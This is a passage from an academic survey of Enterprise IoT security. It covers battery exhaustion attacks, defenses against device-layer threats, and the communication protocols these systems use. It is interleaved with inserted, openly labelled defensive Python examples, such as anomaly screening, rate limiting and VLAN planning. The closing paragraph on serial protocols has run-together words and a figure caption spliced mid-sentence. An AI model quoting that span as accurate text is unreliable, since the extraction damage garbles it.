As a number of E-IoT devices are battery-powered (e.g., remotes, interfaces, sensors, etc.), an attacker could use battery exhaustion attacks to negatively impact the operation of E-IoT systems. Battery exhaustion attacks are a type of Denial-of-Service (DoS) attack that aims to deplete the batteries of devices by forcing the device to perform an excess amount of tasks [99], [100]. Moyers et al. presented the effects of wireless and Bluetooth battery depletion attacks on mobile devices [101]. This work classified three distinct types of battery exhaustion implementations: service request power attacks, benign power attacks, and malignant power attacks. For service request power attacks, attackers target devices by making repeated requests to these devices and exhaust power through the wireless network interface card. In benign power attacks, victims are forced to perform repeated tasks (e.g., data processing, diagnostics) and consume large amounts of power. Finally, malignant power attacks are usually implemented with malware designed to increase power consumption in a device (e.g., increasing the CPU clock). Other work by Martin et al. highlighted the effects of these attacks on wireless devices, noting that battery exhaustion attacks may also cause long-term damage to battery life in addition to a denial-of-service condition when a device becomes unavailable [102].
D. Mitigation of E-IoT Devices Layer Attacks
In this subsection, we highlight possible mitigations to E-IoT devices-layer threats.
Supply Chain Defenses.
A few solutions have been proposed in the literature to defend against supply chain attacks. In order to secure the device endpoints, Yang et al. proposed an RFID-based solution that authenticates devices once they are deployed [60]. This work was taken further with the introduction of ReSC by the same authors, a solution proposed to defend against the theft of authentic smart devices and the insertion of counterfeit malicious devices [61], [62]. Another approach by Chamekh et al. proposed the use of a Merkle tree management framework applied to supply chain architecture to provide a more trusted system and defend against supply chain attacks [63]. During transportation stages, tamper-proof and tamper-evident packages and equipment may also prevent unauthorized attackers from tampering with devices before they reach a client [144], [145]. The European Union Agency for Cybersecurity (ENISA) provided comprehensive guidelines for IoT supply chain security [143]. These guidelines divide defense strategies into several stages relevant to E-IoT: product design, component assembly and embedded software, device programming, platform development, distribution and logistics, technical support & maintenance, and device recovery & repurpose. For product design, the guidelines dictate that secure software libraries and cryptographic practices, sabotage prevention, tamper-resistant software and hardware, and a chain of trust are design practices that may prevent supply-chain attacks. These guidelines are detailed in Table III. Further, the ENISA guidelines highlight that vendors can take some preventative measures such as working with suppliers that provide security guarantees, maintaining transparency, having a skilled workforce, promoting security awareness, and developing novel trust models.
One of the largest topics of research is counterfeit components inserted in the supply chain; as such, best practices and solutions have been proposed. For instance, ENISA guidelines highlight that parts used during manufacturing should be authenticated to prevent counterfeit components from entering the supply chain. Further, ENISA also advises quality control and testing of parts to prevent defective components [143]. Surveys conducted on the topic of counterfeit devices and hardware Trojans have suggested several solutions [56], [57]. First, optical inspection-based detection relies on reverse engineering to detect Trojans. As such, techniques such as scanning optical microscopy, scanning electron microscopy, and pico-second imaging circuit analysis are used. Images captured with these techniques are then compared to benign chipsets provided by the designer. Testing-based detection techniques use functional testing to detect Trojans. As such, a functional set of vectors needs to be designed for each chipset. Side-channel detection approaches rely on factors such as power consumption, EM emissions, and time delays to detect anomalies. Such approaches can also be used to detect Trojans. For instance, Agarwal et al. used Principal Component Analysis to create a side-channel fingerprint of a circuit and compare it to a known, benign model [146]. Run-time detection approaches are also used, usually combining hardware and software to detect Trojans. For instance, DEFENSE is a proposed monitoring framework that operates at device run-time to detect hardware anomalies and Trojans [147]. Finally, invasive techniques modify integrated circuits’ structures to avoid the insertion of hardware Trojans. Authors have shown that hardware obfuscation methods can prevent Trojan insertion and assist other detection methods [148]–[150].
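The side-channel fingerprinting idea above (a known-benign model of a circuit's power behavior, against which incoming parts are compared) can be illustrated with a simplified version. The following is an added example, not code from the survey or from the cited work; it replaces the PCA step with a per-sample mean/standard-deviation fingerprint and an RMS z-score, and all traces, part identifiers and the threshold are constructed for the example.

```python
"""Side-channel fingerprint screening of incoming parts (constructed example).

Builds a per-sample mean/standard-deviation fingerprint from power traces of
known-benign reference parts and scores each part under test by the RMS of its
per-sample z-scores. A part whose trace departs from the fingerprint is routed
to closer inspection. All traces below are constructed, not real measurements.
"""
import math
from statistics import mean, pstdev

# Constructed reference traces: one current-draw sample (mA) per clock phase
# for five known-benign parts, differing only by small measurement jitter.
BASE = [1.00, 1.20, 1.50, 1.10, 0.90, 1.30, 1.40, 1.00]
JITTER = [
    [0.02, -0.02, 0.01, -0.01, 0.02, -0.02, 0.01, -0.01],
    [-0.02, 0.02, -0.01, 0.01, -0.02, 0.02, -0.01, 0.01],
    [0.00] * 8,
    [0.01, 0.01, -0.02, 0.02, -0.01, -0.01, 0.02, -0.02],
    [-0.01, -0.01, 0.02, -0.02, 0.01, 0.01, -0.02, 0.02],
]
REFERENCE_TRACES = [[b + j for b, j in zip(BASE, jit)] for jit in JITTER]

# Constructed parts under test: one within normal jitter, one drawing extra
# current during three phases (a simplified model of additional circuitry
# switching alongside the intended design).
PARTS_UNDER_TEST = {
    "lot-A-unit-7": [b + 0.01 for b in BASE],
    "lot-B-unit-3": [b + d for b, d in zip(BASE, [0, 0, 0, 0.30, 0.30, 0.30, 0, 0])],
}


def build_fingerprint(reference_traces):
    """Return (means, stds) per sample position across the reference traces."""
    length = len(reference_traces[0])
    if any(len(t) != length for t in reference_traces):
        raise ValueError("all reference traces must have the same length")
    columns = list(zip(*reference_traces))
    means = [mean(c) for c in columns]
    # Floor the spread so a perfectly repeatable sample cannot divide by zero.
    stds = [max(pstdev(c), 1e-6) for c in columns]
    return means, stds


def fingerprint_distance(fingerprint, trace):
    """RMS z-score of a trace against the fingerprint (0 = identical to the mean)."""
    means, stds = fingerprint
    if len(trace) != len(means):
        raise ValueError("trace length does not match fingerprint")
    z_squared = [((x - m) / s) ** 2 for x, m, s in zip(trace, means, stds)]
    return math.sqrt(sum(z_squared) / len(z_squared))


def screen_parts(reference_traces, parts, threshold=3.0):
    """Map part id -> (distance, flagged); flagged means 'send to inspection'."""
    fingerprint = build_fingerprint(reference_traces)
    results = {}
    for part_id, trace in parts.items():
        distance = fingerprint_distance(fingerprint, trace)
        results[part_id] = (round(distance, 3), distance > threshold)
    return results


if __name__ == "__main__":
    for part_id, (distance, flagged) in screen_parts(REFERENCE_TRACES, PARTS_UNDER_TEST).items():
        print(f"{part_id}: distance={distance:.2f} {'INSPECT' if flagged else 'pass'}")
```

The threshold is the operational knob: a reference set with more measurement noise widens the per-sample standard deviation and therefore tolerates more variation, so the reference parts must be captured on the same bench setup as the parts under test for the comparison to mean anything.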
Physical Security.
Physical security of cabling and devices is an important part of E-IoT deployments, as E-IoT devices can be stolen, tampered with, or otherwise damaged. Vendors implement some physical mitigations and best practices for many of their devices. Additionally, E-IoT systems make an effort towards tamper-proofing their systems and offer suggestions on physical installation. For instance, Control4 released an exterior installation security best practices document [80]. This document highlights several important points on exposed devices such as door stations used for gate access and intercom. First, installers are encouraged to use the standard tamper-resistant security screws shipped with devices to prevent opportunists from stealing or tampering with devices. Second, relays used to open security gates should not be connected at the door station itself but instead to a relay inside the building. Relays’ endpoints should be in a secure location, as physical attackers may compromise devices by tampering with relays and gain unauthorized access to locations. Finally, the document acknowledges the risks associated with the network cable running to public interfaces (e.g., door stations, intercoms) and highlights network isolation, MAC address filtering, and wireless door station access as possible solutions. In some instances, E-IoT components may only be removed with custom tools to prevent theft and tampering. For instance, touchscreens may come with a special tool so that an unprepared attacker cannot easily remove the interface [151]. Finally, integrators and users should take advantage of monitoring tools (e.g., wireless monitoring, IP monitoring) to identify devices that fall offline and thus learn whether they may have been tampered with. Practices used for loss prevention may also be useful for E-IoT. Concepts such as beacons, smart tags, and geo-fencing may prevent node capture attacks and alert integrators before an attack occurs [74].
Integrators may also take certain steps in the installation to make sure that E-IoT devices are secure. For instance, installers should follow best practices, place sensors in places where they are not easily reachable, and not leave any exposed wiring in installations. As noted earlier, physical access to exposed wiring and devices would make it trivial for an attacker to compromise an E-IoT system in public and unmonitored areas. Further, installers and users should consider physical access control to prevent access by unauthorized users.
TABLE III: Supply Chain Defenses Suggested by ENISA [143].
Stage | Topic | Description
Product Design | Secure Building Blocks | Ensuring usage of accepted security standards (e.g., cryptography, software).
Product Design | Sabotage Prevention | Monitoring for security flaws created by insider threats.
Product Design | Recovery Plan | Consider security mechanisms, fail safes, and a recovery plan for the future.
Product Design | Combined Security Controls | Security mechanisms must consider HW and SW interactions. Security controls (e.g., secure boot) require the usage of tamper resistant hardware.
Product Design | Chain of Trust Definition | A clearly defined chain of trust is necessary to ensure trust on HW and SW elements.
Product Design | Resource Constraints | Purposely developing devices so that current and future security measures can be implemented.
Component Manufacturing | Counterfeit Components | Mitigating security threats from counterfeit components through hardware authentication.
Component Manufacturing | Defective Components | Quality control and usage of tested parts to avoid security and device degradation.
Component Assembly + Embedded Software | Firmware Access Control | Ensure access control mechanisms exist to software, firmware updates and other maintenance operations.
Component Assembly + Embedded Software | Backdoors | Monitoring on suspicious behaviours and backdoors implanted in hardware or low-level code.
Device Programming | Secure Provisioning | Ensuring the use of end-to-end provisioning mechanisms guaranteeing the security of credentials and cryptographic information.
Device Programming | Coding Practices | Adoption of best practices such as code reviews and continuous integration of cybersecurity checks in the software development cycle.
Platform Development | Development Focus | Placing a development approach to focus both on functionality and security.
Platform Development | Dependencies Management | Checks and review process to ensure that dependencies and libraries are available and conform to security practices.
Platform Development | Network Security | Ensure that local network policies minimize the risk of intrusion.
Distribution and Logistics | Value-added Resellers | Certification of resellers and third-party distributors to prevent tampering and unauthorized distribution of devices.
Distribution and Logistics | Theft and Counterfeit Protection | Additional security measures to protect against theft and insertion of counterfeit or malicious components.
Distribution and Logistics | Device Identity | Enabling the ability to identify devices during the fabrication and distribution stages using different HW and SW components.
Distribution and Logistics | Registration Tracking | Ensuring proper device registration and onboarding into smart platforms such that devices can be tracked.
Technical Support and Maintenance | OTA Control Tools | Adoption of remote Over-The-Air control tools used for maintenance are properly managed and secured through a chain of trust.
Technical Support and Maintenance | Software Patches | Usage of software versions that mitigates threats exposed in latest security disclosures.
Device Recovery and Repurpose | Data Removal | Adopting secure data removal techniques to avoid sensitive information remaining on devices.
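The monitoring practice recommended above (watching for devices that fall offline so that a possible tampering or theft is investigated promptly) can be implemented from ordinary poll results. The following is an added example, not code from the survey or from any vendor's monitoring product; the log format, device names, poll interval and allowed silence are all constructed for the example.

```python
"""Offline-device watch built from poll results (constructed example).

Parses a simple 'timestamp device status' poll log, tracks when each device was
last seen, and raises a physical-check alert for devices silent longer than an
allowed gap. The log lines and device names are constructed for the example.
"""
from datetime import datetime, timedelta, timezone

# Constructed poll log: the monitor polls every 5 minutes; the door station
# stops answering after 22:00 while the indoor devices keep responding.
POLL_LOG = """\
2024-03-01T22:00:00Z keypad-closet-1 ok
2024-03-01T22:00:00Z touchscreen-conf-b ok
2024-03-01T22:00:00Z doorstation-gate ok
2024-03-01T22:05:00Z keypad-closet-1 ok
2024-03-01T22:05:00Z touchscreen-conf-b ok
2024-03-01T22:05:00Z doorstation-gate timeout
2024-03-01T22:10:00Z keypad-closet-1 ok
2024-03-01T22:10:00Z touchscreen-conf-b ok
2024-03-01T22:10:00Z doorstation-gate timeout
2024-03-01T22:15:00Z keypad-closet-1 ok
2024-03-01T22:15:00Z doorstation-gate timeout
"""


def parse_timestamp(text):
    """Parse an ISO-8601 UTC timestamp ending in 'Z' (portable across Python versions)."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def last_seen(poll_log):
    """Return {device: datetime of its most recent successful poll}."""
    seen = {}
    for line in poll_log.splitlines():
        if not line.strip():
            continue
        stamp, device, status = line.split()
        if status != "ok":
            continue  # a failed poll is not contact with the device
        when = parse_timestamp(stamp)
        if device not in seen or when > seen[device]:
            seen[device] = when
    return seen


def offline_devices(seen, now, max_silence=timedelta(minutes=12)):
    """Devices silent longer than max_silence, as sorted (device, minutes_silent)."""
    alerts = []
    for device, when in seen.items():
        silent = now - when
        if silent > max_silence:
            alerts.append((device, int(silent.total_seconds() // 60)))
    return sorted(alerts)


if __name__ == "__main__":
    now = parse_timestamp("2024-03-01T22:16:00Z")
    for device, minutes in offline_devices(last_seen(POLL_LOG), now):
        print(f"physical check needed: {device} silent for {minutes} min")
```

The allowed silence should be a small multiple of the poll interval: too tight and every transient wireless dropout becomes an alert, too loose and a removed exterior device is not noticed until the next business day. Devices that are expected to sleep (battery remotes, for example) need their own longer threshold rather than being excluded from the watch.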
Side Channel and Sensory Channel Defenses.
There exist a number of defense solutions against side-channel attacks. For instance, for EM and many side-channel eavesdropping attacks, physical security and encryption provide a level of defense. For attacks that rely on sound, AuDroid is a policy-based framework for smart devices proposed by Petracca et al. [152]. AuDroid controls information flow in audio channels and notifies users when audio access is requested. Access control frameworks such as these may present a viable solution for side-channel attacks where sensory and audio channels can be abused. A number of defense mechanisms proposed for sensors and wireless sensor networks may be applicable to E-IoT against side-channel attacks. For instance, for sensors in mobile devices such as phones, security mechanisms have been an ongoing topic of research [83]–[87]. However, many of these proposed solutions rely on software-based approaches to defend against sensor-based attacks. Alternatively, solutions such as frameworks and intrusion detection systems have been proposed for wireless sensor networks and may apply to large E-IoT deployments configured to rely more heavily on sensors for programmed events [153]–[157]. One example, 6thSense, a sensor-based defense mechanism by Sikder et al., takes a machine learning approach to detect malicious behavior occurring in smart devices [18], [97], [98]. The proposed solution relies on sensor co-dependence, sensor sampling, and real-time monitoring. Since E-IoT systems may share some similarities with the settings of these proposed solutions (e.g., multiple sensors, centralized design), these defense mechanisms may apply to E-IoT against side-channel and sensory channel attacks. While many of these solutions may protect against side-channels, some side-channel attacks (e.g., Light Ears) do not have direct solutions proposed beyond physical security and require future research.
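The sensor co-dependence idea behind 6thSense (in benign use, certain sensors are active together, so a sensor engaging without its usual companions is suspicious) can be shown with a much simpler model than the paper's. The following is an added example, not 6thSense's own code or model: it learns, from constructed benign windows, the set of sensors that always accompanied each sensor, and reports windows that break that pattern. The sensor names and windows are constructed.

```python
"""Sensor co-dependence check in the spirit of 6thSense (simplified, constructed).

From windows of benign activity, learn for every sensor the set of sensors that
were always active alongside it. At run time, a window in which a sensor is
active while one of its learned companions is silent is reported as suspicious
(e.g., the microphone engaged while the device is not being handled). The
sensor names and windows are constructed; this is not 6thSense's own model.
"""

# Constructed benign training windows: each is the set of sensors that
# reported activity above their noise floor during a one-second window
# on a handheld E-IoT remote.
BENIGN_WINDOWS = [
    {"accelerometer", "gyroscope"},                          # remote picked up
    {"accelerometer", "gyroscope", "touch"},                 # button pressed
    {"light"},                                               # room lights dimmed
    {"accelerometer", "gyroscope", "touch", "microphone"},   # push-to-talk command
    {"touch", "accelerometer", "gyroscope"},
    {"light", "accelerometer", "gyroscope"},                 # handled while lights change
]


def learn_companions(windows):
    """sensor -> set of sensors active in every benign window where it was active."""
    companions = {}
    for window in windows:
        for sensor in window:
            others = window - {sensor}
            if sensor in companions:
                companions[sensor] &= others  # keep only sensors seen every time
            else:
                companions[sensor] = set(others)
    return companions


def check_window(companions, window):
    """Return {sensor: missing_companions} for sensors that violate co-dependence.

    A sensor never seen in training has no learned companions and is not flagged
    here; in a real deployment it would be handled by a separate allow-list.
    """
    violations = {}
    for sensor in window:
        missing = companions.get(sensor, set()) - window
        if missing:
            violations[sensor] = missing
    return violations


def scan(companions, windows):
    """Indices of windows that violate the learned co-dependence model."""
    return [i for i, w in enumerate(windows) if check_window(companions, w)]


if __name__ == "__main__":
    model = learn_companions(BENIGN_WINDOWS)
    # Constructed run-time windows: the second one shows the microphone active
    # with no handling at all, which never happened in benign use.
    live = [{"accelerometer", "gyroscope"}, {"microphone"}, {"light"}]
    for i in scan(model, live):
        print(f"window {i}: {check_window(model, live[i])}")
```

With the constructed training data the model learns that touch events always come with motion and that the microphone was only ever used while the remote was being held, so a microphone-only window is reported. The intersection rule is strict by design: one benign window in which the microphone fired without motion would erase that companion, which is why a real system needs enough training windows for each activity rather than a handful.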
Battery Exhaustion Defenses.
A number of mitigation strategies have been proposed to combat battery exhaustion attacks on wireless devices. The solution for E-IoT may be entirely dependent on the type of the system. For instance, battery exhaustion defenses may differ between a Zigbee deployment and another wireless-based deployment. Buennemeyer et al. proposed the Battery-Sensing Intrusion Protection System (B-SIPS), which focuses on small mobile hosts and correlates power consumption with wireless activity [103]. Moyers et al. proposed an intrusion detection system (IDS) to protect against malicious activities [101]. The proposed Multi-vector Portable Intrusion Detection System (MVP-IDS) works by monitoring electrical current changes and correlating these with malicious traffic. Other IDSs have been developed, such as the one proposed by Nash et al. that uses CPU load and disk access to estimate power consumption and detect if battery exhaustion attacks are occurring [104]. In situations where devices may be homogeneous, defenses against battery exhaustion attacks can be based on comparing these devices to create a realistic baseline and find anomalies, which may be effective for wireless sensors and interfaces [105]. Finally, work by Hristozov et al. using rate limiting approaches to defend against battery exhaustion attacks was reported to be successful for devices supporting RESTful services [106].
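Two of the defenses just surveyed, the homogeneous-fleet baseline and rate limiting of service requests, are simple enough to show end to end. The following is an added example, not code from the survey or from the cited works: the baseline uses a median/MAD robust z-score over per-device current draw, and the limiter is a per-client sliding window. Device names, current readings, client addresses and request timings are all constructed.

```python
"""Two battery-exhaustion defenses in simplified form (constructed example).

(1) Fleet baseline: for a set of homogeneous battery devices, compare each
    device's average current draw with the fleet median and flag outliers
    using a robust z-score (median absolute deviation).
(2) Rate limiting: cap the number of service requests a single client may send
    to a device within a sliding window, so a flood of requests cannot keep the
    radio and CPU awake. Device names, readings and request traces are constructed.
"""
from collections import defaultdict, deque
from statistics import median

# Constructed: average current draw (mA) per battery-powered remote over the
# last hour. remote-5 is being kept awake by repeated requests.
FLEET_DRAW_MA = {
    "remote-1": 2.1, "remote-2": 2.0, "remote-3": 2.3,
    "remote-4": 2.2, "remote-5": 9.8, "remote-6": 2.1,
}

# Constructed: (seconds, client) service requests arriving at one device.
REQUESTS = [
    (0.0, "10.0.20.5"), (0.5, "10.0.20.9"), (1.0, "10.0.20.5"), (2.0, "10.0.20.5"),
    (3.0, "10.0.20.5"), (4.0, "10.0.20.5"), (5.0, "10.0.20.5"), (6.0, "10.0.20.5"),
    (8.0, "10.0.20.9"), (11.0, "10.0.20.5"),
]


def robust_zscores(readings):
    """Map device -> robust z-score against the fleet median (MAD-based)."""
    values = list(readings.values())
    center = median(values)
    mad = median(abs(v - center) for v in values)
    # With a perfectly uniform fleet MAD is 0; any deviation then counts fully.
    scale = mad if mad > 0 else 1e-9
    return {dev: 0.6745 * (v - center) / scale for dev, v in readings.items()}


def find_drained(readings, threshold=3.5):
    """Devices drawing far more current than their homogeneous peers."""
    return sorted(dev for dev, z in robust_zscores(readings).items() if z > threshold)


def rate_limit(requests, limit=5, window=10.0):
    """Sliding-window limiter: at most `limit` accepted requests per client per `window` s.

    Returns [(t, client, accepted)] in arrival order. Rejected requests are
    answered cheaply (or dropped) instead of being processed.
    """
    recent = defaultdict(deque)
    decisions = []
    for t, client in requests:
        q = recent[client]
        while q and t - q[0] >= window:
            q.popleft()  # forget accepted requests that left the window
        accepted = len(q) < limit
        if accepted:
            q.append(t)
        decisions.append((t, client, accepted))
    return decisions


def rejected_count(decisions, client):
    """Number of requests from `client` the limiter refused."""
    return sum(1 for _, c, ok in decisions if c == client and not ok)


if __name__ == "__main__":
    print("over-budget devices:", find_drained(FLEET_DRAW_MA))
    decisions = rate_limit(REQUESTS)
    for t, client, ok in decisions:
        print(f"t={t:4.1f} {client} {'accept' if ok else 'REJECT'}")
```

The fleet baseline needs no per-device model, which is what makes it practical for a room full of identical keypads or remotes, but it assumes the majority of the fleet is healthy; if most devices are under attack the median moves with them. The limiter's window and limit should be set from the device's legitimate request pattern (a remote that is polled once a minute does not need to accept five requests a second).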
V. COMMUNICATIONS LAYER
In this section, we first cover components of the E-IoT Communications layer such as interfaces and protocols. We follow up with the threat model for this layer. Moreover, we introduce E-IoT communication layer threats and attacks. Finally, we highlight mitigations and security mechanisms applicable to the E-IoT communications layer. Table IV provides an overview of components, attacks, threats, and mitigation strategies at the E-IoT communications layer.
A. Elements of the E-IoT Communications Layer
Ethernet.
Internet Protocol (IP) communication has become one of the most widely deployed standards in internal and external networks. Often, modern homes and offices already have the physical Ethernet wiring and infrastructure for Internet Protocol. As such, an E-IoT system installer can use both standards (IPv4 or IPv6) for Ethernet-based communication [222]. Additionally, with IP, integrators have the flexibility to divide the traffic flow of connected devices with subnetting and virtual LANs (VLANs). For instance, an integrator can divide a larger network into segmented sections with subnetting, determining the maximum number of devices in each segment through network configuration [223]. Similarly, VLANs are used to improve information flow and security and to better manage an IP network [224]. For instance, Pakedge, a vendor of E-IoT-centered network solutions, encourages VLANs for E-IoT installations and network segmentation [225]. As IP is popular and widely supported by many vendors, E-IoT systems will often use IP communication in some of their components. Ethernet provides the advantage of a superior level of reliability and speed compared to its wireless counterpart. Further, Ethernet can power devices through Power-over-Ethernet (PoE) technology [226]. As such, integrators only need to cable a PoE-capable connection to a device, such as a touchscreen, to provide data and power through a single connection. Physical cabling has proven to be a reliable communication method between smart components and remains popular for high-bandwidth, high-reliability applications. For instance, Ethernet may be used to control devices in the equipment rack such as IP-capable A/V receivers, Ethernet-powered IP cameras, or hardwired touchscreens [227]. Moreover, Ethernet offers different networking topologies (e.g., star, ring, single-switch), which grant integrators the flexibility needed for custom E-IoT installations [228].
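The segmentation step described above (carving a larger network into subnets whose size bounds the number of devices in each VLAN) can be worked through with the Python standard library. The following is an added example, not code from the survey or from any vendor's network tooling; the supernet, VLAN ids, purposes and device counts are constructed for the example, and the allocation rule (largest segment first, smallest fitting block) is a common planning heuristic, not a standard.

```python
"""VLAN/subnet planning for an E-IoT network with ipaddress (constructed example).

Given a supernet and per-VLAN device counts, carve the smallest subnet that fits
each VLAN (largest first) and provide a check that two addresses do not share a
broadcast domain. VLAN ids, names and counts are constructed for the example.
"""
import ipaddress

# Constructed segmentation request: (vlan id, purpose, devices expected).
SEGMENTS = [
    (10, "av-rack", 40),
    (20, "touchscreens", 12),
    (30, "cameras", 100),
    (40, "guest-wifi", 200),
]


def prefix_for_hosts(hosts):
    """Longest IPv4 prefix whose usable host count (2^(32-p) - 2) covers `hosts`."""
    for prefix in range(30, -1, -1):
        if 2 ** (32 - prefix) - 2 >= hosts:
            return prefix
    raise ValueError("host count too large for IPv4")


def plan_segments(supernet, segments):
    """Return {vlan: IPv4Network}, allocating the largest segments first from `supernet`."""
    free = [ipaddress.ip_network(supernet)]
    plan = {}
    for vlan, _name, hosts in sorted(segments, key=lambda s: -s[2]):
        need = prefix_for_hosts(hosts)
        for i, block in enumerate(free):
            if block.prefixlen <= need:
                break
        else:
            raise ValueError(f"no free block large enough for VLAN {vlan}")
        block = free.pop(i)
        # Split the block in halves until it is exactly the size needed,
        # returning the unused halves to the free pool.
        while block.prefixlen < need:
            block, spare = block.subnets(prefixlen_diff=1)
            free.append(spare)
        free.sort()
        plan[vlan] = block
    return plan


def usable_hosts(network):
    """Addresses available to devices once network and broadcast are excluded."""
    return network.num_addresses - 2


def same_broadcast_domain(plan, addr_a, addr_b):
    """True if both addresses fall in the same planned VLAN subnet."""
    a, b = ipaddress.ip_address(addr_a), ipaddress.ip_address(addr_b)
    return any(a in net and b in net for net in plan.values())


if __name__ == "__main__":
    plan = plan_segments("10.10.0.0/22", SEGMENTS)
    for vlan, _name, hosts in sorted(SEGMENTS):
        net = plan[vlan]
        print(f"VLAN {vlan:3d} {_name:13s} {str(net):18s} {usable_hosts(net):4d} usable for {hosts} devices")
```

The subnet size is only the first half of segmentation: it limits how many devices can share a broadcast domain, while the inter-VLAN rules on the router or firewall decide whether, for example, the guest VLAN can reach the A/V rack at all. The `same_broadcast_domain` check is the kind of assertion worth keeping in an installation checklist for public-facing devices such as door stations.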
WiFi.
Wireless Fidelity (WiFi) is a frequently used communication protocol for smart devices where Ethernet cabling endpoints are not viable. Various modes within IEEE 802.11 have allowed for increased speeds and frequencies. The main advantage of wireless communication is that E-IoT devices (e.g., thermostats, controllers, A/V) may use a wireless connection without requiring an extra physical connection to integrate into an existing system. Similarly to Ethernet Category cables, the 802.11 generations b, a, g, and n provide different levels of data rates, and operate in the 2.4 GHz or 5.0 GHz bands [229]. In many E-IoT systems, WiFi serves different purposes due to its widespread nature. Many smart device vendors enable wireless network connections natively on their devices, making such devices easy to integrate into E-IoT systems. Examples of WiFi usage in E-IoT systems may include interfaces (e.g., phones, touch screens, tablets) and physical devices (e.g., displays, receivers, projectors). In terms of WiFi security, a number of configurations are available for accepted WiFi security standards, such as Wired Equivalent Privacy (WEP), which is now obsolete, or WiFi Protected Access (WPA), with the latest release being WPA3 [230], [231]. Furthermore, in larger and more complex network deployments, enterprise solutions exist and are usually installed by trained integrators [232]. As such, a number of different configurations are possible with WiFi communication, dependent on the equipment, level of security, and installation requirements of an E-IoT deployment.
ZigBee and Z-wave.
Two of the most popular mesh-network protocols for smart devices are ZigBee and the proprietary Z-wave [233], [234]. Various vendors have embedded radio communication hardware on their thermostats to connect their devices to more extensive mesh networks. While ZigBee and Z-wave are different protocols, they are used for similar purposes in E-IoT systems. For instance, these protocols are often used in low-bandwidth applications to integrate devices such as thermostats, light dimmers, relays, and sensors into a larger system. Mesh networking allows users to retrofit existing installations by replacing existing components such as light switches with wireless-enabled components. For ZigBee, there are usually three types of devices within the ZigBee mesh network: a coordinator, routers, and end devices [235]. The ZigBee coordinator is the root of the ZigBee network and manages components necessary for ZigBee to operate (e.g., security keys, access control, security policies, stack profile). The ZigBee router relays information and routes ZigBee packets among devices. Some ZigBee routers may also have the functions of end devices. Finally, the end devices send and receive communication from parent nodes and are usually designed for a specific purpose (e.g., door locks, light bulbs, sensors). Z-wave follows a similar device architecture with three basic device types: controllers, routers, and slaves. These devices fulfill similar purposes as their ZigBee counterparts [236].
Bluetooth.
Bluetooth is a wireless standard for data exchange between portable and fixed devices. A short-wavelength protocol, Bluetooth operates in the 2.4 to 2.485 GHz range [237]. Additionally, Bluetooth may operate as Bluetooth Low-Energy (BLE) or Bluetooth Mesh, which allow for more varied applications of the protocol [238]. With the number of Bluetooth devices in the market, E-IoT systems are compatible with the protocol for different purposes. For instance, Savant may use Bluetooth Low Energy for their smart lighting solutions, while other systems use Bluetooth for connecting mobile devices and streaming music to the central system [239]. Bluetooth networks, commonly known as piconets, follow a master and slave architecture where up to seven active slave devices can be connected to a master device [240].
TABLE IV: Overview of E-IoT Communication Layer Attacks, Threats, and Mitigations.
Component | Attack/Threat | Mitigations
Serial-based Protocols | Proprietary Protocol Attacks [158] | Vendor updates, access control, and honeypots [159].
Serial-based Protocols | Modbus & BACnet Attacks [160]–[163] | Protocol-specific defenses, network security, protocol improvements, product updates.
WiFi | WEP Attacks [164], [165] | Update the WiFi security protocol and update to WPA2 or WPA3 if possible [166], [167].
WiFi | WPA/WPA2/WPA3 Attacks [165], [168]–[174] | Wireless equipment patching, custom SSID names, WiFi best practices, strong passwords, firewalls, disabling WPS functionality, network security [166], [167], [170], [175].
ZigBee and Z-Wave | ZLL Attacks, Ghost-in-Zigbee, Zigbee DoS, KillerBee, and other Zigbee Attacks [180]–[186] | Disable nonce reuse, software/firmware updates, recommended configuration, protocol changes, message authentication [176]–[179].
ZigBee and Z-Wave | Z-force, rogue controllers, controller duplication, and other Z-wave attacks [180], [187], [188] | Always enable encryption, software/firmware updates, recommended configuration, protocol changes, authentication on all messages [176]–[179].
Bluetooth | Bluesniping, Bluechopping, Bluecutting, Bluedepriving, and other Bluetooth Attacks [176], [190]–[204] | Software updates, setting Bluetooth to non-discoverable mode, directional antennas, disabling Bluetooth when not in use [189].
IR | IR Attacks [205], [206] | Access control and CCTV monitoring.
General Wireless | Jamming [207]–[212] | Defenses vary by wireless protocol used and implementation [207]–[210], [213]–[216].
HDMI-Based Protocols | CEC-Based Attacks [217]–[220] | Access control, CEC-less cables/adapters, and IDS such as HDMI-Watch [221].
IR.
Infrared (IR) is a wireless optical communication medium used to control devices over short, line-of-sight ranges [241]. While limited, as it cannot penetrate through walls and has a short transmission rate, IR remains popular in many consumer devices (e.g., A/V, television remotes, motorized components). As such, because of this widespread support, IR sees common use in many E-IoT systems that need to integrate these devices into centralized E-IoT systems. E-IoT systems integrate these devices using IR flashers placed on physical devices; these flashers relay messages directly to the receiving device [242]. As some devices can only be controlled through IR, E-IoT makes widespread use of IR communication.
Proprietary Wireless.
Not all protocols used by E-IoT systems are well-known or open-source. Proprietary wireless communication protocols are often used in E-IoT systems and have not seen much research. For instance, Radio Technology Somfy (RTS) is used by Somfy, one of the major vendors of E-IoT motorized blinds [243]. Similarly, popular system vendors such as Lutron, Levitron, Legrand, and Crestron also use proprietary wireless protocols that have remained mostly unexplored [244]–[247]. Table V highlights some proprietary wireless protocols used by E-IoT systems and their usage in E-IoT.
Serial-based.
Serial-based communication is a precursor toseveral modern device communication standards. While manymay consider the use of serial-based communication as dep-recated, various E-IoT systems and connected devices of-ficially support serial-based communication for system-to-device integration. Further, some E-IoT systems have builttheir systems on top of existing serial-based communication forproprietary devices. For instance, since the accepted inceptionin 1969 [248], Recommended Standard 232 (RS-232) hasbeen a well-known medium for device-to-device communi-cation. This standard is often used in E-IoT environmentsfor communication between devices. Some of these devicesinclude thermostats, projectors, A/V receivers, A/V switchers,motorized lifts, displays, pool controllers, motorized drapery,and alarm systems that interface with other devices directlythrough serial-based links. A more specific example is theCarrier Infinity Series systems module for HVAC units. Thismodule allows an E-IoT system to communicate with Carrier Fig. 5: E-IoT System with, daisy-chain topology configurationwith two lines and controlled devices.HVAC systems through serial interface or allow for remoteaccess using a physical Ethernet connection [249]. In manycases, serial-based communication is wired in a “daisy-chain”bus configuration where the cabling goes from device-to-device instead of each device is individually wired to the E-IoTcontroller as shown in Figure 5. Such a wiring configurationis a common practice in E-IoT, as daisy-chain is easier to wireand saves the integrators and users in labor and wiring costs.The use of serial-based protocols for a variety of use-casesis widespread among E-IoT vendors. For instance, Crestron’sCresnet has become a ubiquitous name in residential, marine,and commercial installations [250]. Cresnet uses RS-485 half-duplex communication used for communication between de-vices (e.g., interfaces, components, keypads) and the controller[251]. 
